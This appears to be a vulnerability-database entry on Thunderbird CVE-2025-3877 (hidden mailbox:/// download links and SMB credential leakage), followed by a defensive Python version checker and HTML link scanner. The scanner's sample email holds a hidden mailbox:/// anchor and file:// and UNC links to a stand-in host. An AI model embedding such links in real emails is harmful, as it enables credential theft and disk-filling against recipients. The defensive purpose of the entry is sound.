
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-3877 is a vulnerability in Mozilla Thunderbird versions prior to 128.10.1 (the 128 ESR branch) and 138.0.1, publicly disclosed on May 13, 2025. It lies in the email client's handling of mailbox:/// links in HTML emails, which can trigger unauthorized automatic downloads of PDF files. The issue was reported by security researcher Dario Weißer (Mozilla Advisory, Wiz Report).
A crafted mailbox:/// link in an HTML email causes Thunderbird to save a PDF file to the user's desktop or home directory without the normal download prompt and regardless of the user's auto-save settings. The vulnerability has been assigned a CVSS 3.1 base score of 5.4 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L) and is classified under CWE-200. User interaction is required to start the download, but the trigger can be hidden with visual obfuscation, and simply viewing the email in HTML mode is enough to load external content (Red Hat CVE, Mozilla Advisory).
Two impacts are described: the download can be used to fill the victim's disk with garbage data (for example, using /dev/urandom on Linux), or to leak the user's Windows credentials through SMB links when the email is viewed in HTML mode. Because the file is written without a prompt, the vulnerability is well suited to targeted attacks (Wiz Report, Mozilla Advisory).
Mozilla fixed the issue in Thunderbird 128.10.1 and 138.0.1, and users should update to one of those versions. Until the update can be applied, viewing emails in plain text mode prevents external content from loading automatically and removes the trigger (Mozilla Advisory, Wiz Report).
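The following script is an added example for this entry, not code from Mozilla or from the Wiz report. It implements the two checks a defender would want after reading the advisory: deciding whether a Thunderbird version string falls before the fixed releases 128.10.1 and 138.0.1, and scanning an HTML email body for the link types the advisory names (mailbox:/// links and SMB-style links). The sample HTML body is constructed for the demonstration; it does not reproduce a working trigger, and treating file:// URLs and UNC paths as "SMB links" is this example's assumption about what the advisory's wording covers.

```python
import re
from html.parser import HTMLParser

# Fixed releases named in the Mozilla advisory: ESR branch and current branch.
FIXED_ESR = (128, 10, 1)
FIXED_RELEASE = (138, 0, 1)


def parse_version(text):
    """Turn a Thunderbird version string such as '128.10.0esr' into a tuple of ints.

    Suffixes such as 'esr' or 'b2' are dropped (assumption: only the dotted
    numeric part is compared). Short strings are padded so '138' == (138, 0, 0).
    """
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    parts = tuple(int(p) for p in m.group(1).split("."))
    return parts + (0,) * (3 - len(parts))


def is_vulnerable(version):
    """True if this Thunderbird version predates the fix for CVE-2025-3877.

    The 128 ESR branch is fixed at 128.10.1; every other branch (including
    129-137, which never received a separate fix) is fixed at 138.0.1.
    """
    v = parse_version(version)
    if v[0] == 128:
        return v < FIXED_ESR
    return v < FIXED_RELEASE


class LinkCollector(HTMLParser):
    """Collects every URL-bearing attribute (href, src, ...) in an HTML body."""

    URL_ATTRS = {"href", "src", "action", "background", "data", "poster"}

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases tag and attribute names.
        for name, value in attrs:
            if name in self.URL_ATTRS and value:
                self.urls.append((tag, name, value.strip()))


# Link schemes worth flagging in an inbound HTML email, with the reason.
SUSPICIOUS_SCHEMES = {
    "mailbox": "mailbox:/// link (download trigger described in CVE-2025-3877)",
    "smb": "smb:// link (SMB authentication attempt on Windows)",
    "file": "file:// link (assumption: remote file:// hosts resolve to SMB on Windows)",
}
# \\host\share style UNC path, which Windows opens over SMB.
UNC_RE = re.compile(r"^\\\\[^\\/]+\\")


def classify(url):
    """Return a finding string for a suspicious URL, or None for an ordinary one."""
    if UNC_RE.match(url):
        return "UNC path (SMB authentication attempt on Windows)"
    scheme, sep, _ = url.partition(":")
    if sep and scheme.lower() in SUSPICIOUS_SCHEMES:
        return SUSPICIOUS_SCHEMES[scheme.lower()]
    return None


def scan_html(body):
    """Return a list of findings for every suspicious link in an HTML email body."""
    collector = LinkCollector()
    collector.feed(body)
    collector.close()
    return [
        {"tag": tag, "attr": attr, "url": url, "reason": reason}
        for tag, attr, url in collector.urls
        if (reason := classify(url)) is not None
    ]


# Constructed sample body: one benign link, one hidden mailbox:/// link,
# one file:// tracking pixel and one UNC link. Not a working exploit.
SAMPLE_HTML = """<html><body>
<p>Your invoice is ready. <a href="https://example.com/invoice">View online</a></p>
<a href="mailbox:///constructed/example.pdf" style="opacity:0;position:absolute">.</a>
<img src="file://203.0.113.5/share/pixel.png" width="1" height="1">
<a href="\\\\203.0.113.5\\share\\doc.docx">Open document</a>
</body></html>"""


if __name__ == "__main__":
    for ver in ("128.10.0esr", "128.10.1esr", "137.0.2", "138.0.1"):
        print(f"{ver:>12}: {'VULNERABLE' if is_vulnerable(ver) else 'fixed'}")
    for finding in scan_html(SAMPLE_HTML):
        print(f"<{finding['tag']} {finding['attr']}={finding['url']!r}> {finding['reason']}")
```

The version check is the piece to drop into an inventory query (Thunderbird reports its version in the User-Agent of outgoing mail and in about:support); the HTML scan is a mail-gateway or incident-triage rule, and because it only parses the body it runs safely on a quarantined message. Remember that hiding the trigger is part of the attack, so a finding on an invisible or unlabelled link is more suspicious, not less.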
Source: This report was generated using AI